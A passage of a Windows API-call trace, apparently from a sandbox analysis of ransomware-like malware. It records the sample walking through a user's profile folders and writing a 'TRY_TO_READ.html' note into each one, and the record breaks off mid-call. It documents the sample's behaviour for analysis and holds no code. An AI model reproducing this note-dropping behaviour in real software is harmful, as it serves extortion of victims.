(lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0068.560] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.560] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.560] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b320 [0068.561] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466ea8 | out: hHeap=0x410000) returned 1 [0068.561] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.561] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca90 | out: hHeap=0x410000) returned 1 [0068.561] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e830 [0068.561] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.561] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.561] GetLastError () returned 0x0 [0068.561] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.561] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.561] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.561] GetLastError () returned 0x0 [0068.561] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0068.561] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.561] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.561] GetLastError () returned 0x0 [0068.561] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.562] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.563] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.563] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.563] CloseHandle (hObject=0x468) returned 1 [0068.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b378 | out: hHeap=0x410000) returned 1 [0068.563] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0068.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.563] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.563] GetLastError () returned 0x0 [0068.563] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.565] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0068.565] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.566] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.566] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.566] CloseHandle (hObject=0x468) returned 1 [0068.566] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.566] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.566] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0068.567] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0068.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.567] GetLastError () returned 0x0 [0068.567] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.567] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.567] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.568] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.568] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.568] CloseHandle (hObject=0x468) returned 1 [0068.568] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.568] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.568] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.568] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b3d0 | out: hHeap=0x410000) returned 1 [0068.568] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0068.568] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.568] GetLastError () returned 0x0 [0068.569] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.569] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.569] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.570] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.570] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.571] CloseHandle (hObject=0x468) returned 1 [0068.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b428 | out: hHeap=0x410000) returned 1 [0068.571] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x183bc620, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x183bc620, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0068.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.571] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.571] GetLastError () returned 0x0 [0068.571] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.571] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.571] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.572] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.573] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.573] CloseHandle (hObject=0x468) returned 1 [0068.573] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.573] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.573] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.573] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b480 | out: hHeap=0x410000) returned 1 [0068.573] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8dad460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8dad460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0068.573] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.573] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.573] GetLastError () returned 0x0 [0068.573] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.574] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.574] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.575] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.575] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.575] CloseHandle (hObject=0x468) returned 1 [0068.575] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.575] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.575] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.575] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1810 | out: hHeap=0x410000) returned 1 [0068.575] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0068.575] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.575] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.575] GetLastError () returned 0x0 [0068.576] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.576] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.576] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.577] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.577] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.577] CloseHandle (hObject=0x468) returned 1 [0068.577] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.577] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.577] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.577] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1878 | out: hHeap=0x410000) returned 1 [0068.577] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0068.577] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.577] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.578] GetLastError () returned 0x0 [0068.578] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.578] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.578] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.579] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.579] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.579] CloseHandle (hObject=0x468) returned 1 [0068.579] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.579] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.579] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.579] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b18e0 | out: hHeap=0x410000) returned 1 [0068.579] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0068.579] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.579] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.579] GetLastError () returned 0x0 [0068.579] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.580] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.580] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.581] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.581] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.581] CloseHandle (hObject=0x468) returned 1 [0068.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0068.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0068.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b4d8 | out: hHeap=0x410000) returned 1 [0068.581] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0068.581] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.581] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.581] GetLastError () returned 0x0 [0068.581] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8e1f880, ftLastAccessTime.dwHighDateTime=0x1d5e82a, 